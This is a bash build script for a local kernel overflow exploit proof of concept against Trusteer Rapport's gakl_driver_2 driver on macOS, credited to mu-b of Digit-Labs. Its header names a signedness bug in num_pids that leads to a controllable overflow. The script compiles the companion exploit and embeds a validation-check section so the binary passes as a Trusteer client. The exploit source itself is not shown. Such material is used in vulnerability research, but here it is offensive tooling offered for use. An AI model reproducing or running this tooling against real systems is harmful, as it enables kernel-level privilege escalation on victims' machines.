#!/bin/bash
#/* rapport-smash-v2.c
# *
# * Copyright (c) 2017 by <mu-b@digit-labs.org>
# *
# * Trusteer Rapport local kernel overflow exploit - gakl_driver_2 PoC
# * by mu-b - Sat 11 Nov 2017
# *
# * $Id: rapport-smash-v2.sh 44 2019-02-28 09:30:17Z mu-b $
# *
# * - Tested on: Trusteer Rapport (Apple MACOS X 10.12.2)
# *
# * signedess bug in num_pids leading to integer overflow and thus controllable
# * overflow into data segment.
# *
# * compile: ./rapport-smash-v2.sh
# *
# *    - Private Source Code -DO NOT DISTRIBUTE -
# * http://www.digit-labs.org/ -- Digit-Labs 2017!@$!
# */

EXPFILE=rapport-smash-v2

echo -en "Trusteer Rapport local kernel overflow exploit - gakl_driver_2\n" \
         "by: <mu-b@digit-labs.org>\n" \
         "http://www.digit-labs.org/ -- Digit-Labs 2017!@$!\n\n"

if [ ! -f $EXPFILE ]; then
  echo -n "* creating segment file..."
  tempfoo=`basename $0`
  TMPFILE=`mktemp /tmp/${tempfoo}.XXXXXX`
  if [ $? != 0 ]; then
    echo " failed"
    exit $?
  else
    echo " done"
  fi
  echo -n "VALIDATE_CHECK_DATA" > $TMPFILE

  echo -n "* compiling exploit..."
  gcc -Wall $EXPFILE.c -o $EXPFILE -framework IOKit -arch i386 -Xlinker -sectcreate -Xlinker __TRUSTEER -Xlinker __AKL -Xlinker $TMPFILE
  rm $TMPFILE
  if [ $? != 0 ]; then
    echo " failed"
    exit $?
  else
    echo " done"
  fi
fi